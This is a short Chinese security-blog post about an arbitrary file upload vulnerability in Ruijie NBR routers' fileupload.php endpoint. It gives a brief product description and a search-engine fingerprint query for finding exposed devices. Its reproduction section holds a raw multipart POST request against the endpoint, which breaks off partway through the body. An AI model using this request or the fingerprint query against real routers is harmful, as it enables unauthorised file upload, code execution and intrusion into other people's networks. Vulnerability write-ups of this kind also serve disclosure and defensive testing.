当前位置:网站首页 > 更多 > web > 正文

[网络安全] 锐捷NBR路由器fileupload.php任意文件上传漏洞

作者:CC下载站 日期:2023-09-20 02:32:48 浏览:29 分类:web

一、漏洞简介

锐捷NBR路由器是锐捷网络科技有限公司推出的一款高性能企业级路由器。NBR是"Next-Generation Broadband Router"的缩写,意为"下一代宽带路由器"。该路由器具有强大的处理能力和丰富的功能,适用于中小型企业、校园网络和数据中心等场景。锐捷 NBR 路由器 存在任意文件上传漏洞,可能导致执行恶意代码、服务器拒绝服务、数据泄露、网站篡改和横向渗透等危害。

二、影响版本

  • 锐捷NBR路由器

三、资产测绘

  • hunterapp.name=="Ruijie 锐捷 EWEB"

  • 登录页面

  • [网络安全] 锐捷NBR路由器fileupload.php任意文件上传漏洞

四、漏洞复现

POST /ddi/server/fileupload.php HTTP/1.1
Content-Type: multipart/form-data; boundary=00content0boundary00
User-Agent: Java/1.8.0_381
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Content-Length: 219

--00content0boundary00
Content-Disposition: form-data; name="uploadDir"

upload
--00content0boundary00
Content-Disposition: for

                                               

您需要 登录账户 后才能发表评论

取消回复欢迎 发表评论:

关灯